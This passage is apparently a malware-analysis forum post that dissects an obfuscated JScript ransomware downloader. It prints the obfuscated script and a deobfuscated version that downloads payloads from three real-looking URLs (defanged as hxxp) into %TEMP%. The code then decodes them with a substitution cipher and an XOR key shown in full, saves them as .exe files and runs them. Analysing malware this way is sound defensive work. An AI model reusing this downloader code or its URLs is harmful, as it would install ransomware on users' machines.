hEQV09MHgyNTBDO3QyWzB4REJdPTB4MjU4ODt0MlsweERDXT0weDI1ODQ7dDJbMHhERF09MHgyNThDO3QyWzB4REVdPTB4MjU5MDt0MlsweERGXT0weDI1ODA7dDJbMHhFMF09MHgwM0IxO3QyWzB4RTFdPTB4MDBERjt0MlsweEUyXT0weDAzOTM7dDJbMHhFM109MHgwM0MwO3QyWzB4RTRdPTB4MDNBMzt0MlsweEU1XT0weDAzQzM7dDJbMHhFNl09MHgwMEI1O3QyWzB4RTddPTB4MDNDNDt0MlsweEU4XT0weDAzQTY7dDJbMHhFOV09MHgwMzk4O3QyWzB4RUFdPTB4MDNBOTt0MlsweEVCXT0weDAzQjQ7dDJbMHhFQ109MHgyMjFFO3QyWzB4RURdPTB4MDNDNjt0MlsweEVFXT0weDAzQjU7dDJbMHhFRl09MHgyMjI5O3QyWzB4RjBdPTB4MjI2MTt0MlsweEYxXT0weDAwQjE7dDJbMHhGMl09MHgyMjY1O3QyWzB4RjNdPTB4MjI2NDt0MlsweEY0XT0weDIzMjA7dDJbMHhGNV09MHgyMzIxO3QyWzB4RjZdPTB4MDBGNzt0MlsweEY3XT0weDIyNDg7dDJbMHhGOF09MHgwMEIwO3QyWzB4RjldPTB4MjIxOTt0MlsweEZBXT0weDAwQjc7dDJbMHhGQl09MHgyMjFBO3QyWzB4RkNdPTB4MjA3Rjt0MlsweEZEXT0weDAwQjI7dDJbMHhGRV09MHgyNUEwO3QyWzB4RkZdPTB4MDBBMDsNCgkNCgl2YXIgRUdqPW5ldyBBcnJheSgpOw0KCXZhciByZXN1bHRTdHJpbmc9IiI7DQoJdmFyIEhJaTM7IHZhciBPVmM5Ow0KCWZvciAodmFyIFRqPTA7IFRqIDwgY29kZUFycmF5WyJsZW5ndGgiXTsgVGorKykNCgl7DQoJCUhJaTM9Y29kZUFycmF5W1RqXTsNCgkJaWYgKEhJaTMgPCAxMjgpIA0KCQkJe09WYzk9SElpMzt9DQoJCWVsc2UgDQoJCQl7T1ZjOT10MltISWkzXTt9DQoJCUVHai5wdXNoKFN0cmluZ1siZnJvbUNoYXJDb2RlIl0oT1ZjOSkpOw0KCX0NCgkNCglyZXN1bHRTdHJpbmc9RUdqWyJqb2luIl0oIiIpOw0KCQ0KCXJldHVybiByZXN1bHRTdHJpbmc7DQp9Ow0KZnVuY3Rpb24gdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDc2F0dChmaWxlUGF0aCwgY29kZUFycmF5KQ0Kew0KICAgIHZhciB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDSHJvc3Rla3NbInR5cGUiXT0yOw0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJDaGFyc2V0Il09NDM3OyAgICAgICAgIA0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJvcGVuIl0oKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1sid3JpdGVUZXh0Il0odm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDZmF0cyhjb2RlQXJyYXkpKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1siU2F2ZVRvRmlsZSJdKGZpbGVQYXRoLCAyKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1siY2xvc2UiXSgpOw0KfTsNCiB2YXIgeEtleSA9IHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2ZzdGEoIkNZeFVsM2JyMDdTSmJZUzU2ZWVWOGxLd0tIOFNFVzNvIik7DQogDQpmdW5jdGlvbiB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0N4ZGFjKHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2NjYSkNCnsNCglmb3IgKHZhciBUaj0wOyBUaiA8IHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2NjYVsibGVuZ3RoIl07IFRqKyspDQoJew0KCQl2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NjY2FbVGpdIF49IHhLZXlbTWF0aC5mbG9vcihUaiAlIHhLZXkubGVuZ3RoKV07DQoJfQkJDQoJcmV0dXJuIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2NjYTsNCn07".votgorodazaspinoyiputkoroheCCCmanysecretthings());
function votgorodazaspinoyiputkoroheCCCShtyler4(votgorodazaspinoyiputkoroheCCCgutter, votgorodazaspinoyiputkoroheCCCStrokaParam2) {

var votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCvulture ;
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander+ "\u002f";
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCStrokaParam2 ;
//votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCostrokoncert](("votgorodazaspinoyiputkoroheCCClackey","votgorodazaspinoyiputkoroheCCCsnowboard","votgorodazaspinoyiputkoroheCCCunderlying","votgorodazaspinoyiputkoroheCCClongest","votgorodazaspinoyiputkoroheCCCexecration","votgorodazaspinoyiputkoroheCCCsepulchre","votgorodazaspinoyiputkoroheCCCpears","votgorodazaspinoyiputkoroheCCCcassandra","G" + votgorodazaspinoyiputkoroheCCCweasel) + ("votgorodazaspinoyiputkoroheCCCrelapse","votgorodazaspinoyiputkoroheCCClatina","votgorodazaspinoyiputkoroheCCCmanufactured","votgorodazaspinoyiputkoroheCCCflake","votgorodazaspinoyiputkoroheCCCincursion","votgorodazaspinoyiputkoroheCCCunderstand","votgorodazaspinoyiputkoroheCCCnominee","votgorodazaspinoyiputkoroheCCCgentle","votgorodazaspinoyiputkoroheCCCpixels","votgorodazaspinoyiputkoroheCCCimparting","T"), votgorodazaspinoyiputkoroheCCCgutter, false);

votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCtudabilo1 + ("votgorodazaspinoyiputkoroheCCCreligion","votgorodazaspinoyiputkoroheCCCsectors","votgorodazaspinoyiputkoroheCCCserfs","votgorodazaspinoyiputkoroheCCCadvertisements","votgorodazaspinoyiputkoroheCCCquickly","end")]();
var votgorodazaspinoyiputkoroheCCCadvocacy=("wendyADCDEF" + WScript=="wendyADCDEF" + "RAPAPIPATAV2lRAPAPIPATAuZG93cyBTY3JpcRAPAPIPATAHQgSG9zdA==".votgorodazaspinoyiputkoroheCCCmanysecretthings())&&typeof(votgorodazaspinoyiputkoroheCCCGzEAPd)==="undefined";

if (votgorodazaspinoyiputkoroheCCCadvocacy) {

var votgorodazaspinoyiputkoroheCCCbrings = new votgorodazaspinoyiputkoroheCCCZumZum((("votgorodazaspinoyiputkoroheCCCentrap","votgorodazaspinoyiputkoroheCCCsedan","votgorodazaspinoyiputkoroheCCCteens","votgorodazaspinoyiputkoroheCCCbathroom","votgorodazaspinoyiputkoroheCCCislam","votgorodazaspinoyiputkoroheCCCcarlo","votgorodazaspinoyiputkoroheCCCoratorio","votgorodazaspinoyiputkoroheCCCscathing","ASEO")+("votgorodazaspinoyiputkoroheCCCshare","votgorodazaspinoyiputkoroheCCCseventyeight","votgorodazaspinoyiputkoroheCCCdefine","votgorodazaspinoyiputkoroheCCCenquiries","votgorodazaspinoyiputkoroheCCCintermittently","votgorodazaspinoyiputkoroheCCCsnarl","votgorodazaspinoyiputkoroheCCCrarely","votgorodazaspinoyiputkoroheCCCcarol","O")+"DB"+("votgorodazaspinoyiputkoroheCCCtransition","votgorodazaspinoyiputkoroheCCCminnesota","votgorodazaspinoyiputkoroheCCCbasketball","votgorodazaspinoyiputkoroheCCCcinderella","votgorodazaspinoyiputkoroheCCCworld","votgorodazaspinoyiputkoroheCCCopprobrium","votgorodazaspinoyiputkoroheCCCwallis",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCostrokoncert]();
votgorodazaspinoyiputkoroheCCCRhXxGud = "type";
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCRhXxGud] = votgorodazaspinoyiputkoroheCCCchosen;
votgorodazaspinoyiputkoroheCCChGaSMa = "AAF10AA";
votgorodazaspinoyiputkoroheCCCbrings["d3RAPAPIPATAJpdRAPAPIPATAGU=".votgorodazaspinoyiputkoroheCCCmanysecretthings()](votgorodazaspinoyiputkoroheCCCsudabilo1[("votgorodazaspinoyiputkoroheCCCvacation","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCserves","votgorodazaspinoyiputkoroheCCCunanimity","votgorodazaspinoyiputkoroheCCCeverybody","votgorodazaspinoyiputkoroheCCCassistant","")+"R"+"es"+"pon"+votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq['U'].toLowerCase()+"e"+"QmRAPAPIPATA9keQRAPAPIPATA==".votgorodazaspinoyiputkoroheCCCmanysecretthings()]);
votgorodazaspinoyiputkoroheCCCXWaxeQhw = "AAF11AA";
votgorodazaspinoyiputkoroheCCCbrings[(votgorodazaspinoyiputkoroheCCCcasque + "o"+("votgorodazaspinoyiputkoroheCCCinterrogation","votgorodazaspinoyiputkoroheCCCcapability","votgorodazaspinoyiputkoroheCCCcharter","votgorodazaspinoyiputkoroheCCCstinging","votgorodazaspinoyiputkoroheCCCvibration","220")+("votgorodazaspinoyiputkoroheCCCnausea","votgorodazaspinoyiputkoroheCCCadoring","votgorodazaspinoyiputkoroheCCCcancer","votgorodazaspinoyiputkoroheCCCtartar","votgorodazaspinoyiputkoroheCCCpressed","votgorodazaspinoyiputkoroheCCCcoaches","votgorodazaspinoyiputkoroheCCCegoism","22i")+"tion").replace("22"+("votgorodazaspinoyiputkoroheCCCillustrated","votgorodazaspinoyiputkoroheCCCcomponents","votgorodazaspinoyiputkoroheCCCmantel","votgorodazaspinoyiputkoroheCCCplutarch","votgorodazaspinoyiputkoroheCCCvagina","votgorodazaspinoyiputkoroheCCCsprig","votgorodazaspinoyiputkoroheCCCabler","022"), votgorodazaspinoyiputkoroheCCCtudabilo1)] = 0;
votgorodazaspinoyiputkoroheCCCkrDwvrh = "AAF12AA";
votgorodazaspinoyiputkoroheCCCbrings['saveToFile'](votgorodazaspinoyiputkoroheCCCwandermander, 2);
votgorodazaspinoyiputkoroheCCCSswQdi = "AAF13AA";
votgorodazaspinoyiputkoroheCCCbrings['c'+"lo"+"se"]();
var fileArray=votgorodazaspinoyiputkoroheCCCrtfta(votgorodazaspinoyiputkoroheCCCwandermander);
fileArray=votgorodazaspinoyiputkoroheCCCxdac(fileArray);
votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsatt(votgorodazaspinoyiputkoroheCCCwandermander, fileArray );
votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCpromises](votgorodazaspinoyiputkoroheCCCwandermander, votgorodazaspinoyiputkoroheCCCchosen, true);
}

};
try{
votgorodazaspinoyiputkoroheCCCShtyler4("hxxp://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("hxxp://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
votgorodazaspinoyiputkoroheCCCShtyler4("hxxp://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

Deobfuscated :

try {
from_url_to_file_run("hxxp://herimasu.web.fc2.com/09u9jn87?AMLXoFbQSk=KGkINlTdQz?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(e){}

try {
from_url_to_file_run(hxxp://125ru.web.fc2.com/09u9jn87?yMsjsVxGF=efxMvO,"bsMnCcz");
}catch(e){}

try {
from_url_to_file_run("hxxp://hrenner.gmxhome.de/09u9jn87"?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(e){}

With :

function from_url_to_file_run(URL, file_name) {

var path = objShell.ExpandEnvironmentStrings("%TEMP%") + "/" + file_name ;
// c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif (example with first URL)

objRequest.
open("GET", URL, false);
objRequest.
send();

if (WScript == "Windows Script Host") {

var objStream = new ActiveXObject("ADODB.Stream");
objStream.
open();
objStream.
type = 1;
objStream.
write(objRequest.ResponseBody);
objStream.
position = 0;
objStream.
saveToFile(path, 2);
// save the file downloaded
// example for first file => c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif

objStream.close();

var fileArray=rtfta(path); // array of Bytes (char codes)
// load content from file
// => example : c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif
// and call
fsta(fileString) : first "character substitution cipher" decoder
function rtfta(filePath) {
var Hrosteks=WScript["CreateObject"]("ADODB.Stream");
Hrosteks["
type"]=2;
Hrosteks["
Charset"]=437;
Hrosteks["
open"]();
Hrosteks["
LoadFromFile"](filePath);
var fileString=Hrosteks["
ReadText"];
Hrosteks["
close"]();
return fsta(fileString);
};
function fsta(fileString) {

var t1=new Array();
t1[0xC7]=0x80;t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;
.....
.....
t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;
t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

var resultArray=new Array();

for (var Tj=0; Tj < fileString["
length"]; Tj++) {
var OVc9=fileString["
charCodeAt"](Tj);
if (OVc9 < 128) {

var HIi3=OVc9;
}
else {

var HIi3=t1[OVc9];
}
resultArray["push"](HIi3);
};
return resultArray /* y */;
};

fileArray=xdac(fileArray);
// deobfuscation with XOR function, using xKey Array
// (xKey is initialized out of this current
from_url_to_file_run function by
//
var xKey =fsta("CYxUl3br07SJbYS56eeV8lKwKH8SEW3o") - first "character substitution cipher" decoder)
function xdac(cca) {
for (var Tj=0; Tj < cca["
length"]; Tj++) {
cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
}
return cca;

};

path = path + ".exe";
// example with first URL : c:\users\DardiM\AppData\Local\temp\JlLQdKnWwif.exe

satt(path, fileArray );

// calls fats function : second "character substitution cipher" decoder,
//and save the file as real ".exe"

function satt(filePath, codeArray) {
var Hrosteks=WScript["CreateObject"]("ADODB.Stream");
Hrosteks["
type"]=2;
Hrosteks["
Charset"]=437;
Hrosteks["
open"]();
Hrosteks["
writeText"](fats(codeArray));
Hrosteks["
SaveToFile"](filePath, 2);
Hrosteks["
close"]();
};
function fats(codeArray) {

var t2=new Array(); t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;
t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89];
...
...
...
t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["
length"]; Tj++) {
HIi3=codeArray[Tj];
if (HIi3 < 128) {
OVc9=HIi3;
}
else {
OVc9=t2[HIi3];
}
EGj.push(String["
fromCharCode"](OVc9));
}
resultString=EGj["
join"]("");
return resultString;
};

objShell.
Run(path, 1, true); // run the exe file
}
};

rtfta ,fsta, xdac and satt are the functions we have seen in a precedent post, hidden in the very long "encrypted" string .

They are used to make the obfuscated exe file (not seen as an exe file when downloaded, with content modified), becomes the real exe ransomware

CONCLUSION :

This current script try to download 3 files (same files, but it gives them 3 different names )
=> no part to see if one was already successfully downloaded :rolleyes:
=> no part to see if the deobfuscation made the good exe files (for example a check of "MZ" at the beginning of the file) :confused:

The obfuscation of the script is very well done by several methods, I have rarely seen as many different good methods in one file.
But : the URLs are VERY easy to be retrieved at the end of the file, in the try catch parts...:D
=> a simple unscape unicode method...
=> I got them since the beginning - see part 2)
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-529178

So to End this Part 3 analysis :

=> "Why, plz why ?"
The only "good answer" would be : "downloading the obfuscated ransomware without the functions to deobfuscate it is useless"
=> "yes but it's too easy to black-list / report the URLs and file names used, and : we don't specially want to analyze the ransomwares" :p

It's also a (bad) way to quickly update the URLs / names parts when distributed ...

N.B: adding // (commentary line) to the "run" part line allows people to have the deobfuscated files (the last part of function seen in try catch blocks). And also because we can see their names that appears in clear (we just have to add ".exe" to the names) => easy to find them with a "search" on HD after their are "ready" .exe files.
votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCpromises](votgorodazaspinoyiputkoroheCCCwandermander, votgorodazaspinoyiputkoroheCCCchosen, true);
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top